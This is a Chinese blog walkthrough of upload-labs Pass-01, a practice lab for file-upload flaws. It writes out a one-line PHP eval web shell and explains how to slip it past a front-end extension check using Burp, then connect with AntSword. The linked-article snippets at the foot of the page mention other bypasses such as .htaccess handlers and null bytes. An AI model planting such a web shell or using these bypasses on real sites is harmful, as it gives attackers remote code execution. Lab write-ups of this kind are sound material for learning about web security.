upload-labs/Pass-01

最新推荐文章于 2024-06-24 10:45:59 发布
最新推荐文章于 2024-06-24 10:45:59 发布
阅读量96 收藏
点赞数 1
分类专栏: upload-labs 文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64593235/article/details/130278313
版权

本文,用upload-labs进行测试学习,仅供参考.

首先,创建一份文档,写入一句话木马。写完后改文章后缀为jpg。

php @eval($_POST[cmd]);

因为本题不允许直接上传php文件,所以我们可以选择用支持的方式进行绕过。

 

burp抓包发送重放器,修改后缀发送放过提交就好了。

 我们已经看到地址了。

发现已经成功上传,之后可以通过蚁剑复制地址,用cmd密码连接就好了(密码不是唯一,看自己)

 后面蚁剑连接,就不弄出来了,出了点问题,我给当病毒查杀了,导致文件无法使用。

注:文章中的所有内容仅供做学习使用,任何人用此方法进行未经授权的渗透行为都与文章与我本人无关,请各位大佬不要进行未经授权的渗透行为……

 

 

 

北冥曙光
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Upload-labs 1-20关靶场通关攻略(全网最全最完整)
dragon的博客
03-15 3183
在github上找upload-labs-0.1环境,部署在小皮面板上也可以直接下载他的集成的环境。 Sethandler将该目录及子目录的所有文件均映射为php文件类型。 Addhandler使用 php5-script 处理器来解析所匹配到的文件。 AddType将特定扩展名文件映射为php文件类型。 简单来说就是,可以将我们所的文件都解析成php或者是特定的文件解析为phpPHP 在处理文件名或路径时,如果遇到 URL 编码的 %00,它会被解释为一个空字节(ASCII 值为 0)
Upload-labs pass-01至10关
yyw260187453的博客
04-09 167
​。
upload-labs通关教程-pass01-12
byll1024的博客
03-29 617
文件上传靶场练习通关-upload-labs前12关
upload-labs通关(Pass-01~Pass-05)
箭雨镜屋
10-07 2318
开始之前,准备好burpsuite,浏览器配置好代理。 Pass-01 这关要求上传一个webshell,我选择了一个叫sh.php的文件并点击上传之后,跳出了一个弹框,提示当前文件类型不是允许上传的文件类型。 在burpsuite上proxy模块的http history中看了一下,并没有上传文件相关的报文,说明弹框时文件格式没有经过后端校验。 查看网页源代码,发现文件类型和弹框是由前端JS代码校验的。 这关至少有两种方法:浏览器disable JS,或者上传合法格式的文件,burp抓包
upload-labs Pass-01(详解)
菜菜的博客
09-26 446
思路:发现了只能上传图片类型,我们可以使用burp来修改前端,来上传php一句话木马,或者在burp里上传的图片的文件后添加一句话木马。打开蚁剑,输入url地址http://192.168.7.56:1111/upload/7.php 输入一句话密码cmd,点击测试连接,点击添加。发现前端限制了我们只能上传.jpg .png .gif类型的文件。burp就会显示,下面很长而且看不懂的就是图片文件的内容。打开burp,打开抓包,浏览器先上传一张图片。就上传成功了,右键图片点击新建标签打开图像。
Upload-labs Pass-01 前端JS限制
baynk的博客
11-03 481
0x01 前端JS限制 过程 直接上传php 并且响应速度特别快,通过这个可以判断大概率就是前端做了JS限制了,浏览器F12查看源码。 点击上方按钮,然后点击上传按钮,找到对应源代码。 通过表单果然看到了JS代码,然后在源码中搜索JS代码名称,可以看到具体的内容。 这里有两种方式来更改前端JS。第一种是用burpsuite,刷新页面的时候然后修改返回包,第二种则可以在浏览器F12控制台直...
Upload-labs Pass-01
a_running_snail_的博客
02-13 467
 源代码: function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定...
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
upload-labs19-20以及总结1
08-08
Pass19中,开发者试图通过限制上传文件的扩展名来防止这种攻击,但是他们只检查了保存文件名(`save_name`)是否包含黑名单中的扩展名,而未检查实际上传文件的类型。 以下是该关卡的主要知识点: 1. **文件名...
upload-labs-master.zip
06-22
文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master
UPLOAD-LABS详细解题步骤
05-17
UPLOAD-LABS详细解题步骤 UPLOAD-LABS是一个网络安全靶场,旨在帮助用户练习文件上传的安全知识。该靶场提供了多个关卡,每个关卡都有一定的安全挑战和限制,旨在考验用户的安全知识和技术。 在开始之前,需要先...
WEB渗透学习-upload-labs靶场
04-20
upload-labs为WEB渗透中文件上传漏洞专项练习靶场,内涵各种文件上传漏洞类型,采用关卡制,一共21关,由易到难,适合刚接触该漏洞的新手巩固练习
[极客大挑战 2020]Roamphp4-Rceme
不会编程的崽的博客
06-20 375
右键源代码里给了提示,有备份文件index.php.swp,大伙都做到这来了,应该不用写了吧。加这个[~%FF]只是因为php7的解析方式,当然换成其他的也可以例如[~%EF] [~%CF]passthru(next(getallheaders()));然后,需要要绕过两层,多年rce经验,相信你一眼能看出。我们由内往外构造,这里需要前置知识(贴其他大佬的吧)知道原因可以在评论区踢我一脚。
深入了解PHP的If...Else语句
Perfect—完美的博客
06-20 501
if…else语句用于根据条件执行不同的代码块。if (条件) {// 当条件为真时执行的代码} else {// 当条件为假时执行的代码if…else语句是PHP中最基础也是最重要的控制结构之一。通过使用if、if…else、if…elseif…else以及嵌套if语句,可以实现复杂的条件判断逻辑。条件运算符和switch语句提供了更加简洁和高效的代码写法。掌握这些控制结构的用法,将有助于你编写更加灵活和健壮的PHP代码。
深度解析SD-WAN在企业组网中的应用场景
TIANGEKUAJING的博客
06-21 371
在现代企业快速发展的网络环境中,SD-WAN技术不仅是实现企业各站点间高效连接的关键,也是满足不同站点对互联网、SaaS云应用和公有云等多种业务需求的理想选择。本文将从企业的WAN业务需求出发,对SD-WAN的组网场景进行全面解析,涵盖多种业务情境。
php上传zip压缩包到服务器并解压,解析压缩包内excel表格数据导入到数据库
hanzhuhuaa的博客
06-21 250
为了让客户上传数据方便,考虑了一下决定通过后台上传压缩包的方式实现。1.需要管理后台将excel表格中的每条单词数据导入到数据库中.2.每条单词数据对应的图片和音频文件需要上传到服务器中.
discuz插件之优雅草超级列表互动增强v1.2版本更新
最新发布
qq_21592105的博客
06-24 331
title]20220617 v1.2发布[/title]增加了对php8的支持 增加了 对discuz3.5的支持。discuz插件之优雅草超级列表互动增强v1.2版本更新。
windowns server2016服务器配置php调用powerpoint COM组件
qq_40408065的博客
06-21 1359
解决问题:windowns server2016服务器配置php调用powerpoint COM组件 环境: windows server2016 宝塔(nginx+mysql+php7.2) IIS 搭建宝塔: 下载地址:https://www.bt.cn/download/windows.html ​ 安装使用,开启时若主机在云上,登录地址是本地ip加宝塔端口(8888),下面地址是宝塔自动生成的云 主机面板,需要将ip改为本地ip。 选择安装软件:nginx,php,mysql等 添加网站
仿迪恩城市门户分类信息网discuz模板
爱酷码的博客
06-24 421
Discuz x3.3模板 仿迪恩城市门户分类信息网 (GBK)
upload-labs/Pass-07 漏洞复现
09-08
对于 upload-labs 的 Pass-07 漏洞复现,我可以给你一些指导。首先,请确保你已经下载并配置好了 upload-labs 的环境。 Pass-07 是一个文件上传漏洞的挑战,目标是成功绕过上传限制并执行恶意代码。 以下是一般的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值